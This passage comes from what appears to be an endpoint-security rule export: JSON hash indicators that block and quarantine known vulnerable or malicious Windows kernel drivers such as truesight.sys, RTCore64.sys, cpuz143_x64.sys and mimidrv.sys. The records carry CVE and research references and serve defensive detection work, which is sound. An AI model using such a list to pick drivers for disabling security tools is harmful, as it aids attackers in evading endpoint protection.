+ "hl_testing_start_time": "2026-03-23T11:45:31.481372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eba7f6ae36e0aaa7ade176acf1af218739dbf6c6a25a56e6b5ced1567a3f6db5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0df3d649-ac45-5a8c-8ce2-f59b43232a69",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495310Z",
+ "creation_date": "2026-03-23T11:45:31.495313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "03eb25b9ffd3d58bb6f6c29d38697839ca871dfa211e42dddb19c6a84ec395f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0df92180-5030-59d9-8fda-83d0caeca6f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610563Z",
+ "creation_date": "2026-03-23T11:45:29.610565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8688e43d94b41eeca2ed458b8fc0d02f74696a918e375ecd3842d8627e7a8f2b",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0df9b8a5-4ddb-53ac-9b47-ec96b018b630",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826281Z",
+ "creation_date": "2026-03-23T11:45:30.826283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4876c029a6c88d98090beabfd5f6e1e5186824280224dc5178ad07427d737d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e04109e-55bb-5a15-aadb-805874a76252",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151108Z",
+ "creation_date": "2026-03-23T11:45:31.151110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99d42356eba7c7b6ee35797ee093d629649bd73dab14944f59ca89f354053c8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e1ee81a-59b9-5759-b6dc-29932b4396f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606386Z",
+ "creation_date": "2026-03-23T11:45:29.606388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6222ed7d921b84e4ffcfa6638861348033191a3cc350547f7dcfb8927040f0a4",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e3c2ad0-8fd5-58f1-bc1d-8af917413301",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477391Z",
+ "creation_date": "2026-03-23T11:45:30.477395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477414Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98ec7cc994d26699f5d26103a0aeb361128cff3c2c4d624fc99126540e23e97e",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e40e719-43f6-5139-9eea-7d3e975cbc0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606060Z",
+ "creation_date": "2026-03-23T11:45:29.606062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606068Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ff39728f1c11d1108f65ec5eb3d722fd1a1279c530d79712e0d32b34880baaa",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e41b11a-7f28-55f4-af45-6f7eaa96ab8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824886Z",
+ "creation_date": "2026-03-23T11:45:30.824890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "178238d8a0b3e642aaafc2217cac9c9277420b2ef2b16302d10b7952b8054799",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e41fa7f-745a-5eaf-8a82-37c3b507223c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481658Z",
+ "creation_date": "2026-03-23T11:45:30.481660Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481666Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42b528fdde50a21afed0cbdc07a6cb9d22d421eb0228d4782f18d22a83873223",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e47cb8c-109e-5b59-bfae-ff4fd123196c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497707Z",
+ "creation_date": "2026-03-23T11:45:31.497709Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91808676497a3475557879cb44eda3e252f5170385e37c476629652324b9a512",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e4f2091-7067-5399-a99a-0a5443a242f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465985Z",
+ "creation_date": "2026-03-23T11:45:30.465988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e50c0b4-20e2-59d7-972f-12543adfa566",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828401Z",
+ "creation_date": "2026-03-23T11:45:30.828403Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9e21c38488850dada38cc727028ed84d56192003eac34ed12f59a389d30a3fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e541cd8-42be-5369-a6cf-bbc721b0f5a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813088Z",
+ "creation_date": "2026-03-23T11:45:31.813091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813100Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91d8852011e6fc1a8ef8221a02357ce09f073d667d8eab9af269c5e22e7b1386",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e646631-85aa-54bf-87ae-4ccab2e177ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142220Z",
+ "creation_date": "2026-03-23T11:45:31.142222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "624ccf6b462b82f89a8736f3269b57114ddaf714f809736c9962db06a17b6ce3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e6a6826-16d4-5870-9dfc-6aa6a1c7eda4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607346Z",
+ "creation_date": "2026-03-23T11:45:29.607348Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607353Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df0cc4e5c9802f8edaefeb130e375cad56b2c5490d8ebd77d8dbdcc6fdc7ecb6",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e6d7ecc-6ae1-5154-822e-04c4442a1fa3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808742Z",
+ "creation_date": "2026-03-23T11:45:31.808745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808750Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfafcdb644b4c02b78eaef05a352b824cad60c36f118bcb00fb3e3a9fdc8b60d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e6e2165-8dcf-56f9-99f0-b2da2e98b27c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455332Z",
+ "creation_date": "2026-03-23T11:45:30.455335Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455344Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b26c4678ecd37d1829513f41ff9e9df9ef1d1d6fea9e3d477353c90cc915291",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/70fa8606-c147-4c40-8b7a-980290075327/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e73eafa-a53a-5ef0-85ba-a6998bac0c9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981472Z",
+ "creation_date": "2026-03-23T11:45:29.981474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edfc38f91b5e198f3bf80ef6dcaebb5e86963936bcd2e5280088ca90d6998b8c",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e85c7b8-e01f-5040-b48d-d58998131d7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608051Z",
+ "creation_date": "2026-03-23T11:45:29.608053Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608058Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c9829a16eb85272b0e1a2917feffaab8ddb23e633b168b389669339a0cee0b5",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e90f41d-55ed-5471-9feb-c20b9523d797",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829211Z",
+ "creation_date": "2026-03-23T11:45:31.829214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f35f07641f662583754d8a1ad1a457c438cc6901ae9be6d4225f61e8c1c2d0cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e912366-051c-56f7-93e4-fdbb0e28d490",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829610Z",
+ "creation_date": "2026-03-23T11:45:31.829612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829618Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e9d032fc15f52433c9a7b5c079bcb110d61c87b004111617694221a58c6a98e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0e9e4053-9826-50b4-8a0e-495383ba544a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835892Z",
+ "creation_date": "2026-03-23T11:45:30.835894Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835900Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "868ffecf2f6ab6e58385d83429b014bd3214ff51393caa1dd1cb39719fc9183e",
